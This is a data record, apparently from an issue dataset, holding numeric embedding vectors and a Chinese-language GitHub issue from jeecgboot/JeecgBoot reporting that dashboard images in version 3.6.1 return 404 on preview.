-0.012393616139888763, -0.017386673018336296, -0.0001068644633051008, -0.014475991949439049, -0.009328112006187439, 0.00509756151586771, -0.006634184159338474, 0.012478768825531006, -0.014220532961189747, 0.007667630910873413, 0.026134196668863297, 0.006901254877448082, -0.004226679913699627, -0.009382300078868866, -0.012153640389442444, -0.0025681338738650084, 0.0036170626990497112, -0.028502995148301125, -0.006754172500222921, -0.012153640389442444, 0.0054343026131391525, 0.005964573007076979, 0.0170925073325634, -0.0005389790749177337, -0.0016091960715129972, 0.00681223114952445, -0.0180988609790802, -0.013547050766646862, 0.0017891783500090241, 0.014259238727390766, 0.024198902770876884, -0.0007088010315783322, -0.004946609027683735, 0.005592996720224619, -0.005430432036519051, 0.005623961333185434, -0.01426697988063097, -0.001459210878238082, -0.008793971501290798, 0.007706336677074432, -0.012432321906089783, 0.00989321805536747, 0.007028984371572733, 0.006707725580781698, -0.002728763036429882, -0.016999613493680954, 0.01791307143867016, 0.0003287578874733299, 0.011379523202776909, -0.0014630814548581839, 0.006398078519850969, -0.0325748510658741, 0.02181462198495865, -0.01197559293359518, 0.0059761847369372845, 0.004211197607219219, 0.01891942508518696, 0.00634001987054944, -0.014042485505342484, 0.0035590038169175386, 0.013717357069253922, -0.00699801929295063, 0.015250109136104584, -0.008793971501290798, -0.006189066916704178, 0.01594681479036808, 0.0014446962159126997, 0.012540698982775211, 0.0034003097098320723, 0.016844790428876877, 0.01530429720878601, -0.014607591554522514, -0.0035241686273366213, -0.007028984371572733, 0.001675963751040399, -0.0006705790292471647, -0.02873522974550724, 0.014715967699885368, -0.004226679913699627, 0.0005607511266134679, -0.004342797677963972, 0.006549031473696232, -0.03997541218996048, -0.009235218167304993, -0.010218347422778606, 0.001083764131180942, -0.0009768391028046608, -0.01600874401628971, 0.0014708227245137095, 0.007172195706516504, 0.03263678029179573, 0.000004800433998752851, -0.005124656017869711, 0.02302224561572075, 0.0152810737490654, 0.00008128230547299609, -0.023935703560709953, -0.005863937549293041, 0.00718380743637681, -0.007729560136795044, 0.013539309613406658, -0.011418228968977928, 0.009575829841196537, -0.012633592821657658, 0.00015361388796009123, 0.021582387387752533, 0.01332255732268095, 0.020421212539076805, 0.029292594641447067, 0.012625851668417454, 0.01164272241294384, 0.012192346155643463, -0.01561394426971674, -0.0019575487822294235, -0.002912615891546011, 0.003094533458352089, 0.02200041152536869, -0.008314019069075584, 0.02052958868443966, 0.02107146941125393, 0.0007262186845764518, 0.008523030206561089, -0.005569773260504007, -0.005925867240875959, -0.014274721033871174, -0.0019401311874389648, 0.0068702902644872665, -0.00563557306304574, 0.021443046629428864, 0.00040955637814477086, 0.000031085644877748564, 0.01420505065470934, 0.00908813625574112, 0.02234102226793766, -0.0018927165074273944, -0.002090116497129202, -0.03687894344329834, 0.006374855060130358, 0.004942738451063633, 0.018749117851257324, -0.011689169332385063, -0.019972223788499832, 0.011565310880541801, -0.003858974203467369, -0.003276451025158167, 0.05431206151843071, -0.01265681628137827, -0.019894812256097794, -0.008523030206561089, -0.012060745619237423, 0.00518271466717124, -0.027156030759215355, 0.028688782826066017, -0.007667630910873413, 0.01520366221666336, -0.01093827560544014, -0.004129915032535791, -0.010829899460077286, 0.004443432670086622, -0.022697115316987038, 0.0003582711215130985, 0.013376745395362377, -0.006576125510036945, 0.0062084197998046875, 0.007385077886283398, 0.015095285139977932, -0.0008433039183728397, -0.003545456798747182, 0.0010160288074985147, -0.0016169373411685228, -0.0046601854264736176, -0.010481546632945538, -0.02388925664126873, -0.02457047998905182, 0.0015588784590363503, 0.014096674509346485, -0.0013692197389900684, -0.01703057810664177, -0.015087543986737728, -0.006630313582718372, 0.0061542317271232605, -0.008476583287119865, -0.023378338664770126, 0.00945971254259348, 0.006754172500222921, -0.0197090245783329, 0.002136563416570425, -0.017340226098895073, -0.0041260444559156895, -0.0017620843136683106, -0.002140433993190527, 0.008360465988516808, -0.014839827083051205, -0.0007620216347277164, 0.01789758913218975, -0.0013392227701842785, 0.016055190935730934, 0.0028700395487248898, -0.006881901994347572, -0.003895744914188981, 0.004396985750645399, 0.014832085929811, 0.020746340975165367, 0.010992464609444141, -0.025747137144207954, 0.01026479434221983, -0.0033461216371506453, -0.004466656129807234, 0.016767378896474838, -0.009273923933506012, -0.01238587498664856, -0.023935703560709953, 0.014731450006365776, 0.012780674733221531, 0.01459985040128231, 0.010520252399146557, 0.004857585299760103, 0.008244347758591175, 0.01026479434221983, -0.005697502754628658, 0.005968443583697081, 0.011178252287209034, -0.0005520423292182386, 0.00017961938283406198, -0.002945516025647521, 0.01600874401628971, -0.013438674621284008, 0.006216160953044891, 0.027310853824019432, 0.009769358672201633, -0.002939710160717368, -0.01281938049942255, 0.010558958165347576, 0.0083449836820364, -0.00887912418693304, 0.0037583389785140753, -0.008453359827399254, -0.020576035603880882, -0.008050818927586079, 0.016194531694054604, -0.010992464609444141, -0.007547642569988966, -0.0025332984514534473, 0.014290203340351582, -0.013159992173314095, -0.003351927502080798, 0.006703855004161596, 0.018749117851257324, 0.017077025026082993, -0.008236606605350971, 0.01275745127350092, -0.020545070990920067, 0.003266774583607912, 0.043907929211854935, -0.014948203228414059, -0.0043737622909247875, -0.0023378338664770126, -0.009900959208607674, 0.0011979463743045926, -0.025251703336834908, -0.021427564322948456, -0.008515289053320885, -0.03858200088143349, -0.0010905376402661204, -0.0004777754656970501, 0.0036422214470803738, 0.019693542271852493, 0.01755697838962078, -0.010582182556390762, -0.009219735860824585, 0.002130757551640272, 0.010992464609444141, 0.004280867986381054, -0.01480112038552761, -0.009266182780265808, 0.006912866607308388, 0.013848956674337387, 0.012935498729348183, -0.005647184792906046, 0.05886387079954147, -0.00006555805157404393, 0.005709114484488964, 0.013167733326554298, -0.003862844780087471, -0.0032435511238873005, 0.006065208464860916, 0.0199102945625782, -0.022728081792593002, 0.007125748787075281, 0.005267867352813482, 0.0064600082114338875, 0.032141346484422684, -0.0018627195386216044, -0.004675667732954025, -0.0092507004737854, 0.00619293749332428, 0.0013876050943508744, -0.01309032179415226, 0.0010508641134947538, -0.0016246784944087267, -0.013399968855082989, 0.018764600157737732, -0.004822750110179186, 0.01641128398478031, 0.010272535495460033, -0.0032416158355772495, -0.014181827194988728, 0.007365725003182888, -0.036104824393987656, -0.0014882403193041682, -0.004180232994258404, 0.013817992061376572, 0.004853714723140001, 0.01797500066459179, 0.013043874874711037, 0.009204253554344177, 0.01789758913218975, -0.0011747227981686592, -0.02509688027203083, 0.006521937437355518, 0.012378133833408356, 0.00285068666562438, -0.011905922554433346, 0.010202865116298199, 0.016504177823662758, -0.006038113962858915, 0.005418820306658745, 0.00901846494525671, 0.002488786820322275, 0.004934997297823429, 0.016101637855172157, -0.0008486259612254798, 0.0022139751818031073, 0.024508550763130188, -0.03248195722699165, -0.01803692989051342, -0.004226679913699627, -0.020699894055724144, -0.004331185948103666, 0.01238587498664856, -0.01042735856026411, 0.010961499065160751, 0.002001093002036214, -0.009335853159427643, -0.007218643091619015, 0.010442840866744518, 0.007036725524812937, -0.022774528712034225, -0.005178844090551138, 0.01013319380581379, -0.0004852747078984976, -0.00369447423145175, -0.01430568564683199, -0.022232646122574806, -0.011410487815737724, 0.027233442291617393, -0.007625054568052292, -0.00551558518782258, 0.0007223481079563498, -0.011100840754806995, -0.005372373387217522, -0.019089730456471443, -0.007884383201599121, -0.011495640501379967, -0.012695522047579288, -0.0030693747103214264, -0.005658796522766352, -0.016504177823662758, 0.03560939058661461, -0.007625054568052292, 0.014050227589905262, -0.026970243081450462, 0.002577810315415263, 0.006537419743835926, -0.009196512401103973, 0.003543521510437131, 0.020235422998666763, -0.005275608506053686, 0.0007508936687372625, -0.011843993328511715, 0.005372373387217522, -0.017046060413122177, -0.014894015155732632, -0.015366226434707642, -0.020607000216841698, -0.01322966255247593, -0.022387469187378883, -0.011518863961100578, 0.0008075010264292359, 0.00212688697502017, 0.007551513146609068, -0.0168912373483181, -0.002316545695066452, 0.004207327030599117, 0.007307666353881359, 0.010481546632945538, 0.007818583399057388, -0.009142324328422546, 0.0023900868836790323, -0.0076985955238342285, -0.0012695521581918001, 0.012292981147766113, 0.00367512134835124, 0.006866419687867165, -0.014723708853125572, 0.01857881247997284, 0.01322966255247593, 0.0006221967050805688, 0.001497916760854423, -0.004420209210366011, -0.00023223516473080963, 0.004559550434350967, 0.012223310768604279, -0.009142324328422546, 0.005894902627915144, 0.006355502177029848, 0.022031376138329506, 0.01325288601219654, 0.011124064214527607, -0.02469433844089508, 0.03464948758482933, 0.007745042443275452, -0.004989185370504856, -0.018005965277552605, -0.00848432444036007, -0.01594681479036808, -0.010419617407023907, -0.010574440471827984, -0.012958722189068794, 0.01168142817914486, -0.003371280385181308, 0.012703263200819492, 0.015931332483887672, -0.00236492813564837, 0.005910384934395552, 0.013291592709720135, 0.026892831549048424, -0.02678445540368557, 0.0018491724040359259, -0.0025352337397634983, -0.005844584666192532, -0.007400560192763805, 0.013639944605529308, 0.021690763533115387, 0.009753876365721226, 0.002039798768237233, -0.0027094101533293724, 0.015962297096848488, -0.006413560826331377, -0.01743311993777752, 0.006777395959943533, -0.013655426912009716, -0.014398579485714436, 0.015962297096848488, 0.0045556798577308655, 0.005310444161295891, 0.011178252287209034, -0.0014969491166993976, 0.0024249220732599497, 0.011511122807860374, 0.002821657108142972, -0.02779080718755722, 0.02847203053534031, 0.01930648274719715, -0.0026532867923378944, -0.011000205762684345, -0.005473008379340172, 0.00031327555188909173, -0.006123267114162445, 0.0076444074511528015, -0.023595092818140984, 0.007942442782223225, -0.01554427295923233, -0.01642676629126072, 0.006579996086657047, 0.010295758955180645, 0.002183010568842292, 0.024276316165924072, -0.026939278468489647, -0.016395801678299904, -0.008298536762595177, 0.000989418593235314, 0.009986111894249916 ]
null
null
null
null
null
null
null
null
null
[ "jeecgboot", "jeecg-boot" ]
##### 版本号: 3.6.1 ##### 问题描述: 使用仪表盘的图片组件,上传图片后进行预览,图片加载不出来。浏览器报404错误。 ##### 截图&代码: ![image](https://github.com/jeecgboot/jeecgboot-vue3/assets/42018550/131fb7de-6e41-4011-aca5-b77ccf3517c7) ##### 前端安装环境: > 如果你是启动报错,请说明你的前端环境 - 采用的是pnpm安装还是yarn? - node版本号:? - pnpm版本号:? #### 友情提示(为了提高issue处理效率): - 未按格式要求发帖,会被直接删掉; - 请自己初判问题描述是否清楚,是否方便我们调查处理; - 描述过于简单或模糊,导致无法处理的,会被直接删掉;
3.6.1仪表盘图片加载不出来
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/6361/comments
3
2024-05-06T06:59:00
2024-06-25T09:18:44Z
https://github.com/jeecgboot/JeecgBoot/issues/6361
2,366,049,940
6,361
false
This is a GitHub Issue repo:jeecg-boot owner:jeecgboot Title : 3.6.1仪表盘图片加载不出来 Issue date: --- start body --- ##### 版本号: 3.6.1 ##### 问题描述: 使用仪表盘的图片组件,上传图片后进行预览,图片加载不出来。浏览器报404错误。 ##### 截图&代码: ![image](https://github.com/jeecgboot/jeecgboot-vue3/assets/42018550/131fb7de-6e41-4011-aca5-b77ccf3517c7) ##### 前端安装环境: > 如果你是启动报错,请说明你的前端环境 - 采用的是pnpm安装还是yarn? - node版本号:? - pnpm版本号:? #### 友情提示(为了提高issue处理效率): - 未按格式要求发帖,会被直接删掉; - 请自己初判问题描述是否清楚,是否方便我们调查处理; - 描述过于简单或模糊,导致无法处理的,会被直接删掉; --- end body ---
537
[ 0.00015258364146575332, -0.00910765677690506, -0.0005969304475001991, 0.046095896512269974, 0.007634990382939577, -0.021989915519952774, -0.021904129534959793, 0.05395965278148651, -0.011316657066345215, -0.031226253136992455, -0.013718676753342152, 0.005375948268920183, 0.009365016594529152, -0.00028729511541314423, 0.017886467278003693, 0.0015352192567661405, -0.025650136172771454, 0.023190926760435104, 0.004196385387331247, -0.009543738327920437, -0.014104715548455715, -0.042607251554727554, 0.02267620712518692, 0.03111187182366848, -0.013561401516199112, 0.011645505204796791, 0.03294198215007782, 0.006937975995242596, -0.03683096542954445, -0.024134576320648193, 0.0148410489782691, 0.026222046464681625, -0.012081585824489594, 0.018458375707268715, 0.004753997083753347, -0.03299917280673981, 0.015784699469804764, 0.04743988439440727, -0.04129185900092125, -0.029939457774162292, -0.014068971388041973, -0.022533230483531952, 0.00875021331012249, 0.035201024264097214, -0.03857528790831566, -0.0031437145080417395, -0.041806578636169434, 0.00035677317646332085, -0.015370065346360207, 0.0020964054856449366, 0.024792272597551346, -0.04303618147969246, 0.003631624625995755, -0.011002106592059135, 0.020431462675333023, -0.02311943657696247, 0.07085957378149033, 0.05902104824781418, 0.005054249428212643, 0.003867537248879671, -0.00412847101688385, -0.035915911197662354, 0.01687132753431797, 0.003374265506863594, -0.05636167153716087, 0.0598217211663723, -0.025564350187778473, 0.07154586911201477, 0.010766194202005863, 0.02374853752553463, 0.0033403083216398954, -0.0036191141698509455, 0.0437510684132576, -0.0023287434596568346, 0.02575021982192993, -0.019559301435947418, 0.022433146834373474, -0.017200175672769547, -0.016370905563235283, -0.001282328157685697, -0.019745171070098877, 0.023291010409593582, -0.04426578804850578, -0.007792265620082617, 0.020460058003664017, 0.05607571452856064, -0.03111187182366848, -0.07417664676904678, -0.0031204805709421635, -0.003390350379049778, 0.014898239634931087, -0.01888730749487877, -0.021089158952236176, -0.027794796973466873, 0.038546692579984665, 0.00966526847332716, -0.008228346705436707, 0.005286587402224541, -0.03420018032193184, 0.017872167751193047, 0.009922628290951252, 0.01901598833501339, -0.054217010736465454, -0.03285619616508484, 0.02071741782128811, -0.01897309347987175, 0.041577812284231186, -0.025721624493598938, 0.004024812486022711, 0.02629353478550911, -0.008328430354595184, -0.0012287115678191185, -0.05873509496450424, -0.03665939345955849, -0.02177545055747032, 0.054703135043382645, -0.0002893057244364172, 0.006441129371523857, -0.0026683148462325335, 0.0014029652811586857, -0.012975194491446018, -0.0401766337454319, 0.007470566313713789, -0.010308667086064816, -0.04498067498207092, 0.06136588007211685, -0.0043322136625647545, -0.01053743064403534, 0.0045931474305689335, -0.02976788394153118, 0.0006684191175736487, -0.011309508234262466, -0.004761145915836096, -0.018672842532396317, 0.04540960490703583, -0.00498990947380662, -0.015927676111459732, 0.05190077796578407, -0.004121322184801102, -0.04383685439825058, -0.03136923164129257, -0.06416823714971542, 0.028009261935949326, -0.007173888385295868, -0.03237007185816765, 0.022819185629487038, 0.02080320380628109, 0.012460475787520409, -0.013654337264597416, 0.031540803611278534, -0.048497915267944336, 0.008535747416317463, 0.011888566426932812, 0.04529522359371185, 0.04097730666399002, 0.010244326665997505, -0.005854922346770763, 0.024163171648979187, 0.02343398705124855, -0.01920185796916485, 0.0033277978654950857, 0.0008685874054208398, 0.03768882900476456, -0.025807412341237068, 0.017300259321928024, -0.044122811406850815, -0.03763163834810257, -0.01802944391965866, -0.025206906720995903, 0.007534906268119812, -0.015098407864570618, 0.009679566137492657, 0.0011170104844495654, 0.024520615115761757, -0.06794283539056778, -0.003892558393999934, 0.008471407927572727, -0.018000848591327667, -0.0014404967660084367, 0.0012930514058098197, -0.0024699335917830467, -0.034171584993600845, 0.03957613185048103, -0.00952944066375494, -0.01068755704909563, -0.03237007185816765, -0.008600087836384773, -0.03239866718649864, -0.01607065461575985, 0.004836208652704954, -0.007134569808840752, 0.019530706107616425, 0.03231288120150566, -0.03943315148353577, -0.0116026122123003, -0.005225822329521179, -0.021031968295574188, -0.06062239781022072, 0.0005593989044427872, -0.009693864732980728, 0.002375211101025343, 0.005894241388887167, -0.020374272018671036, 0.00962237548083067, 0.008278388530015945, 0.025650136172771454, -0.015913378447294235, 0.027751903980970383, -0.028938615694642067, -0.03594450652599335, -0.0176291074603796, 0.024134576320648193, 0.00901472195982933, -0.039118602871894836, -0.017243068665266037, 0.014869644306600094, 0.012896557338535786, 0.018915902823209763, 0.007434822153300047, 0.009708162397146225, 0.021031968295574188, -0.019573599100112915, -0.01615644060075283, 0.021275030449032784, -0.07549203932285309, -0.001526283216662705, 0.0020463631954044104, 0.01727166399359703, -0.007370482198894024, -0.000931139977183193, 0.01910177432000637, -0.05181499198079109, 0.0015325384447351098, -0.00785660557448864, 0.024449126794934273, -0.04346511512994766, -0.02942473813891411, -0.010272922925651073, -0.017243068665266037, 0.004657486919313669, 0.005958580877631903, -0.003753155469894409, 0.001864067162387073, -0.03645922243595123, 0.0016799838049337268, 0.011824226938188076, 0.001634409767575562, -0.03897562623023987, 0.007209633011370897, -0.014898239634931087, -0.005847773514688015, 0.012074436992406845, -0.017486128956079483, -0.0013127108104526997, 0.030854512006044388, -0.01798655092716217, -0.0076421392150223255, -0.011752737686038017, 0.020917586982250214, 0.011395295150578022, 0.005415267311036587, 0.029624907299876213, -0.07360474020242691, 0.000718907976988703, 0.05721953511238098, -0.03191254287958145, 0.004657486919313669, 0.033542487770318985, -0.01002271194010973, -0.04129185900092125, 0.03199833258986473, -0.0334852933883667, -0.027380162850022316, 0.023534072563052177, -0.037917591631412506, 0.0023680622689425945, -0.002360913436859846, 0.014161906205117702, 0.008285537362098694, 0.0008587577030993998, 0.04824055731296539, 0.008306983858346939, 0.0014878580113872886, -0.027037017047405243, 0.0011179042048752308, 0.021947022527456284, 0.028495386242866516, -0.026121960952878, -0.007649288047105074, 0.05250128358602524, -0.01924475096166134, -0.03400001302361488, -0.03545838221907616, 0.009386463090777397, 0.011423890478909016, 0.04721112176775932, -0.014740964397788048, 0.029567716643214226, 0.017557619139552116, 0.009429356083273888, -0.02812364511191845, 0.006308875512331724, -0.058906666934490204, -0.01201009750366211, 0.0008301622583530843, -0.007799414452165365, 0.02896721102297306, 0.008828851394355297, 0.004353660158813, -0.02879563719034195, 0.04915561154484749, 0.006837891880422831, -0.03208411857485771, -0.03382844105362892, -0.03262742981314659, 0.018958795815706253, -0.024692188948392868, 0.025735922157764435, -0.055017683655023575, -0.021360816434025764, -0.02294786460697651, -0.008364174515008926, -0.05481751635670662, 0.003917579539120197, 0.03359967842698097, 0.01305383164435625, -0.02852398157119751, -0.010315815918147564, 0.0008556300890631974, 0.03440035134553909, 0.045952919870615005, -0.04312196746468544, -0.0014539009425789118, 0.02147519774734974, 0.03460051864385605, -0.0283524077385664, -0.014519349671900272, -0.023148031905293465, -0.008836000226438046, -0.0008596513071097434, -0.015856187790632248, 0.02419176697731018, -0.01727166399359703, -0.02870985120534897, 0.02356266789138317, -0.04526662826538086, 0.010666110552847385, 0.0055618188343942165, 0.014569391496479511, 0.009393611922860146, 0.0008788639097474515, 0.010044158436357975, -0.0036566457711160183, 0.01812952756881714, 0.008449961431324482, -0.012975194491446018, -0.004975611809641123, -0.02379143051803112, 0.0029685671906918287, 0.00019536513718776405, 0.0005169524811208248, -0.05130027234554291, 0.006834317464381456, 0.041577812284231186, 0.05518925562500954, 0.0238772165030241, -0.010601770132780075, -0.014633731916546822, -0.02839530073106289, -0.03208411857485771, -0.032970577478408813, 0.02133222110569477, -0.06971575319766998, 0.03900422155857086, -0.025192609056830406, -0.0165138840675354, -0.04735409840941429, -0.005769135896116495, -0.035858720541000366, 0.01848697103559971, -0.03357108309864998, -0.010215731337666512, -0.016142142936587334, 0.004300043918192387, 0.01954500377178192, 0.05816318467259407, 0.0050042071379721165, 0.008321281522512436, 0.03431456536054611, -0.029038699343800545, -0.029095890000462532, -0.00029980562976561487, -0.017443235963582993, -0.035286810249090195, -0.014462159015238285, -0.019387729465961456, 0.01678554154932499, -0.006301726680248976, 0.014826751314103603, -0.042206913232803345, 0.000006286674761213362, 0.039719108492136, 0.030597152188420296, 0.0021982768084853888, -0.015870485454797745, -0.007109548896551132, 0.026164855808019638, -0.018558459356427193, -0.02575021982192993, 0.01674264669418335, -0.010258625261485577, -0.023534072563052177, 0.032026927918195724, 0.009786799550056458, 0.019830958917737007, 0.04143483564257622, 0.006265982519835234, -0.007113123312592506, -0.015956271439790726, -0.0005388458957895637, -0.004189236555248499, 0.00041217688703909516, -0.004107024520635605, 0.011523974128067493, -0.016185035929083824, -0.01588478311896324, -0.01674264669418335, 0.026050472632050514, 0.03508664295077324, -0.016185035929083824, -0.02366275154054165, -0.00855004508048296, 0.0261076632887125, 0.01145248580724001, 0.016528181731700897, 0.028023559600114822, 0.03308495879173279, -0.007928093895316124, 0.011881417594850063, -0.02507822774350643, -0.013783016242086887, 0.03986208513379097, 0.02692263573408127, -0.024963844567537308, -0.04815477132797241, -0.02513541840016842, -0.03771742433309555, -0.014898239634931087, -0.023062245920300484, 0.010766194202005863, -0.042607251554727554, -0.001249264576472342, -0.03740287572145462, -0.04663921147584915, -0.032570239156484604, 0.0092649320140481, -0.04629606381058693, 0.02173255756497383, -0.0034618391655385494, 0.004775443580001593, 0.01559882890433073, 0.054703135043382645, -0.0321413092315197, -0.011187977157533169, -0.004421574529260397, 0.008828851394355297, 0.008700171485543251, -0.0030203964561223984, 0.018401185050606728, 0.0010490963468328118, -0.008964680135250092, 0.0018372589256614447, 0.06885789334774017, 0.05067117139697075, -0.030740130692720413, -0.01508411020040512, -0.026322130113840103, 0.009615226648747921, -0.0043143415823578835, 0.017128687351942062, -0.022075703367590904, -0.018558459356427193, 0.035372596234083176, 0.008306983858346939, 0.0020499378442764282, -0.020274188369512558, 0.013640038669109344, -0.02820943109691143, 0.010244326665997505, 0.03277041018009186, 0.009136253036558628, 0.01229605171829462, -0.0535593144595623, 0.036573607474565506, -0.0031312040518969297, -0.008621534332633018, -0.007920945063233376, -0.012260307557880878, 0.015012621879577637, 0.023505475372076035, 0.058048803359270096, 0.0022715525701642036, -0.015141300857067108, 0.017071494832634926, 0.00511144008487463, 0.00749916210770607, 0.010008414275944233, 0.028366705402731895, -0.04080573469400406, 0.03737428039312363, -0.017757786437869072, -0.0296820979565382, 0.013389828614890575, -0.03834652528166771, 0.0025324863381683826, -0.02637932077050209, -0.009143401868641376, 0.007002315483987331, 0.04906982555985451, 0.021632472053170204, -0.033942822366952896, 0.010165689513087273, -0.002775547793135047, 0.014855346642434597, 0.02696552872657776, 0.016084952279925346, 0.007563501596450806, 0.007080953102558851, 0.014154757373034954, -0.025678731501102448, -0.03319934010505676, 0.0067270840518176556, 0.04772583767771721, 0.056447457522153854, -0.020831799134612083, 0.020917586982250214, -0.003792474279180169, -0.005408118013292551, 0.0015173470601439476, -0.029481928795576096, 0.004364383406937122, 0.0021750428713858128, 0.0017890040762722492, 0.003585156984627247, -0.03382844105362892, -0.0022876376751810312, -0.023691346868872643, -0.00392830278724432, 0.009650970809161663, 0.023891514167189598, 0.017757786437869072, -0.04071994870901108, 0.00912910420447588, 0.01634231023490429, -0.008743064478039742, 0.012060139328241348, 0.01281077042222023, -0.00777796795591712, -0.005597562994807959, 0.0392901748418808, 0.017171580344438553, -0.0187443308532238, 0.007116697728633881, 0.004668210633099079, 0.014955430291593075, -0.006601979024708271, -0.02057444117963314, 0.018458375707268715, -0.04360809177160263, -0.02682255022227764, 0.023233819752931595, 0.018944498151540756, -0.016170738264918327, -0.015613126568496227, 0.014669476076960564, -0.0015486234333366156, 0.048812467604875565, 0.00912910420447588, -0.005157907959073782, 0.00646257633343339, 0.0343717560172081, -0.008006731979548931, -0.015527339652180672, -0.0009624162921682, -0.017614809796214104, -0.008957531303167343, 0.02905299700796604, -0.04255006089806557, -0.005901390220969915, -0.01321110688149929, 0.005515351425856352, -0.010401601903140545, 0.0028613342437893152, 0.007277546916157007, 0.0016210057074204087, -0.030654342845082283, 0.024363340809941292, 0.0002341254148632288, 0.025721624493598938, -0.04312196746468544, 0.014433563686907291, 0.03334231674671173, 0.00350473215803504, -0.02204710803925991, 0.02035997435450554, 0.019802363589406013, 0.040548376739025116, 0.013825909234583378, 0.01479815598577261, 0.009443653747439384, 0.015341470018029213, 0.020417165011167526, 0.027923475950956345, 0.004846932366490364, 0.002205425640568137, -0.0040891519747674465, 0.009858287870883942, 0.03663079813122749, -0.002135724062100053, 0.019530706107616425, 0.039661917835474014, -0.03397141769528389, 0.027437353506684303, -0.020831799134612083, 0.021947022527456284, 0.006008623167872429, -0.02361985854804516, -0.012117329984903336, -0.017243068665266037, -0.03888984024524689, -0.04209253191947937, -0.019216155633330345, -0.016542479395866394, -0.03757444769144058, 0.015727508813142776, 0.02566443383693695, 0.01567031815648079, -0.002834525890648365, -0.015727508813142776, -0.02928176149725914, -0.01376871857792139, 0.014941132627427578, -0.023862918838858604, -0.0033367339055985212, -0.008950382471084595, 0.027308674529194832, -0.027880582958459854, 0.011195125989615917, 0.002205425640568137, 0.023548370227217674, -0.012910855002701283, 0.013354084454476833, -0.0024735082406550646, 0.00861438550055027, 0.01479815598577261, -0.03191254287958145, 0.014898239634931087, 0.04280741885304451, -0.0033992864191532135, -0.00498990947380662, -0.04335073381662369, -0.004550253972411156, 0.02606477029621601, -0.0022912120912224054, 0.01758621446788311, 0.03428597003221512, -0.010387304238975048, -0.0015414746012538671, 0.027880582958459854, 0.03148361295461655, 0.05029943212866783, -0.02507822774350643, -0.0032455858308821917, 0.0062981522642076015, -0.007091676350682974, -0.01731455698609352, -0.010008414275944233, -0.03471489995718002, -0.017600512132048607, -0.002303722547367215, -0.011466783471405506, -0.012074436992406845, 0.017600512132048607, 0.010666110552847385, -0.021174944937229156, 0.005079270340502262, -0.02088898979127407, -0.01571321114897728, 0.0312548503279686, -0.0028255898505449295, 0.0013547104317694902, 0.02776620164513588, 0.03176956623792648, 0.010851981118321419, 0.006423257291316986, -0.025907495990395546, -0.0019945339299738407, -0.010673259384930134, 0.012531965039670467, -0.05201515927910805, -0.04415140673518181, -0.0002261946356156841, -0.02928176149725914, 0.010630365461111069, 0.015370065346360207, 0.012696388177573681, -0.012088734656572342, 0.019073178991675377, -0.008171155117452145, 0.0035190300550311804, 0.006162323523312807, -0.013704379089176655, 0.01567031815648079, 0.02865266054868698, -0.009079061448574066, -0.005168631207197905, -0.04192095994949341, -0.018458375707268715, -0.03365686908364296, 0.0004919314524158835, -0.018715735524892807, 0.023820025846362114, -0.020159807056188583, -0.018201015889644623, 0.014119013212621212, -0.0041356198489665985, 0.026936933398246765, -0.0141762038692832, -0.0064947460778057575, 0.00997981894761324, -0.029453333467245102, 0.006848615128546953, -0.001946279196999967, 0.009936925955116749, 0.0052830129861831665, 0.008950382471084595, 0.013018087483942509, 0.005161482375115156, -0.03368546441197395, -0.013218255713582039, -0.006033644080162048, -0.002182191703468561, -0.014383520931005478, 0.003127629403024912, -0.013132469728589058, -0.021189242601394653, -0.029481928795576096, 0.00850715208798647, -0.0017925784923136234, -0.012803621590137482, 0.009801097214221954, 0.0039211539551615715, 0.020388569682836533, -0.007259674835950136, 0.0026093365158885717, 0.016313714906573296, 0.008314132690429688, 0.011323805898427963, -0.016857029870152473, -0.024449126794934273, 0.024806570261716843, 0.023291010409593582, -0.027465948835015297, 0.03768882900476456, 0.015112705528736115, 0.024048790335655212, 0.0185298640280962, -0.0067092119716107845, 0.0033206490334123373, 0.01714298501610756, -0.006634148769080639, 0.04154921695590019, 0.019945340231060982, 0.014855346642434597, -0.0016781965969130397, -0.0383751206099987, 0.0062516843900084496, 0.002217936096712947, -0.028824234381318092, 0.02677965722978115, -0.012045841664075851, -0.016928518190979958, 0.014698071405291557, 0.005036377348005772, 0.00463246600702405, -0.0040033659897744656, -0.035143833607435226, -0.005225822329521179, 0.02093188464641571, 0.0046753594651818275, -0.017071494832634926, -0.003552987240254879, 0.033857036381959915, -0.005036377348005772, 0.03022541105747223, -0.01292515266686678, -0.023648453876376152, 0.002759462920948863, 0.027265779674053192, -0.01701430417597294, -0.0036995389964431524, -0.014033227227628231, 0.007066655438393354, 0.01802944391965866, -0.019230453297495842, 0.016442395746707916, -0.0033224362414330244, -0.0045466795563697815, -0.044208597391843796, 0.01878722384572029, 0.009543738327920437, -0.011638356372714043, -0.025049632415175438, -0.007792265620082617, 0.007349035702645779, -0.03723130002617836, -0.004024812486022711, -0.0019248325843364, 0.02414887398481369, -0.0020106190349906683, 0.004657486919313669, 0.00841421727091074, 0.007327589206397533, -0.02951052412390709, -0.0017970465123653412, -0.012374689802527428, -0.0018238548655062914, 0.027566032484173775, 0.024606401100754738, -0.019073178991675377, -0.0035994546487927437, 0.004203534219413996, -0.015584531240165234, 0.020960479974746704, -0.021217837929725647, 0.031054679304361343, 0.009751055389642715, 0.039661917835474014, -0.007173888385295868, 0.01336838211864233, 0.015055514872074127, -0.025964686647057533, -0.012839365750551224, 0.007052357774227858, -0.01794365793466568, 0.026079067960381508, -0.0015423682052642107, -0.011273764073848724, 0.03848950192332268, 0.012867961078882217, 0.015012621879577637, 0.03237007185816765, -0.004671785049140453, 0.0027040590066462755, -0.013189660385251045, 0.0044144256971776485, -0.010923469439148903, 0.06016486883163452, -0.015641722828149796, 0.008171155117452145, 0.0218755342066288, -0.0057584126479923725, 0.0009954797569662333, -0.01973087340593338, 0.010837683454155922, -0.011288061738014221, 0.01781497709453106, -0.016185035929083824, -0.014190501533448696, 0.05150043964385986, -0.03683096542954445, -0.04455174133181572, 0.007234653923660517, 0.024220362305641174, -0.02437763847410679, 0.003688815515488386, -0.01745753362774849, 0.015913378447294235, -0.0021768300794065, -0.037746019661426544, -0.03888984024524689, 0.011724142357707024, -0.02004542388021946, -0.02888142503798008, -0.0026861869264394045, -0.012739282101392746, 0.014605136588215828, -0.02057444117963314, -0.014740964397788048, -0.010544579476118088, 0.0021893407683819532, -0.016628265380859375, -0.012203116901218891, -0.0428646095097065, 0.0010258625261485577, 0.013060980476439, -0.013504210859537125, -0.040462590754032135, -0.01448360551148653, 0.026050472632050514, 0.0016120696673169732, 0.0032866918481886387, 0.007434822153300047, -0.025635838508605957, -0.008878893218934536, 0.022604718804359436, 0.03228428587317467, -0.023505475372076035, 0.002593251643702388, 0.012396136298775673, 0.012274605222046375, -0.005751263815909624, -0.0220900010317564, 